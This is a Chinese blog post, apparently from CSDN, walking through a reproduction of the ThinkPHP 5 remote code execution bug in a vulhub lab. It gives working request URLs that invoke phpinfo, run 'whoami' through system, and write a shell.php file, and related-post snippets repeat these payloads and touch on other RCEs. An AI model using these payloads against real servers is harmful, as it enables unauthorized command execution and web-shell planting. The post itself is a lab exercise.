5-rce版本漏洞复现

最新推荐文章于 2024-05-03 11:34:04 发布
最新推荐文章于 2024-05-03 11:34:04 发布
阅读量136 收藏
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68471358/article/details/131816873
版权

首先进入靶场环境

cd /usr/local/vulhub/vulhub/thinkphp/5-rce(这个是我自己的路径,大家以自己的为主)

输入vim docker-compose.yml

将version改为“2”,:wq保存退出

接着执行

docker-compose up -d(在开启的时候要注意端口是否冲突,将自己之前的退出)

 

此时环境以成功搭建

漏洞复现

1)输出关于 PHP 配置的信息

/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

2whoami

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

3)还可以将php代码写入文件

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>

接着访问shell.php

重楼学网安
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vuhub thinkphp-5-rce漏洞复现
qq_46804551的博客
04-24 499
搭建 your-ip:8080 搭建成功 漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
thinkphp 5-rce版本漏洞复现(超详细版)
精品博客,你值得一看~
08-06 7977
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码。(3)还可以将php代码写入文件, 此处我们写一个phpinfo。(1)在url输出关于 PHP 配置的信息。说明存在远程命令执行漏洞!ip a #获取自己的本机 ip。(4)查看shell.php内容。直接访问 ip+端口。
ThinkPHP2--RCE漏洞复现
m0_74402888的博客
05-03 1061
var['\1']="\2" 这里双引号引发函数执行,了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?()值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将键和值分别提取出来,所有有两个(),一个匹配键,一个匹配值。$a的执行语句执行了(注意如果要实现该代码需要修改php的版本为5.x的版本)s=a/a/a/${phpinfo()} 其中a随意。
CVE-2023-33246 RCE漏洞复现
七堇年的博客
06-08 1956
在RocketMQ 5.1.0及以下版本在一定条件下,会存在远程命令执行风险;由于RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外攻击者还可以通过伪造 RocketMQ 协议内容来达到同样的效果。
ThinkPHP2-RCE漏洞复现
qq_51459600的博客
06-08 1172
影响版本:PHP 5.2~5.6/e 修 正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
漏洞复现步骤如下: 1. **创建恶意Java类**: 首先,你需要编写一个名为`Testjk.java`的恶意Java类,其中包含一个构造函数,该构造函数使用`Runtime.getRuntime().exec()`方法执行任意系统命令。例如,它可能创建...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8331
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
大学生创业计划书(11)三篇文件.docx
07-11
大学生创业计划书(11)三篇文件.docx
大学生创业计划书(9)三篇文件.docx
07-11
大学生创业计划书(9)三篇文件.docx
清华大学美术学院论文答辩演讲PPT模板
07-11
【作品名称】:清华大学美术学院论文答辩演讲PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
大学生创业计划书(17)三套材料.docx
07-11
大学生创业计划书(17)三套材料.docx
BW365_EN_Col62.pdf
07-11
BW365_EN_Col62
时尚风格论文答辩PPT模板
07-11
【作品名称】:时尚风格论文答辩PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
议题:如何进行bom断阶,编码指标树一组 (1).xlsx
最新发布
07-11
议题:如何进行bom断阶,编码指标树一组 (1)
2023-04-06-项目笔记 - 第一百九十一阶段 - 4.4.2.189全局变量的作用域-189 -2024.07.11
07-11
2023-04-06-项目笔记-第一百九十一阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.189局变量的作用域_189- 2024-07-11
致远m3-server反序列化rce漏洞复现
12-22
致远m3-server存在反序列化RCE漏洞,攻击者可以利用此漏洞在远程服务器上...总的来说,复现致远m3-server反序列化RCE漏洞需要仔细分析漏洞利用的过程,同时要遵守相关法律法规,不得在未经授权的情况下攻击他人系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值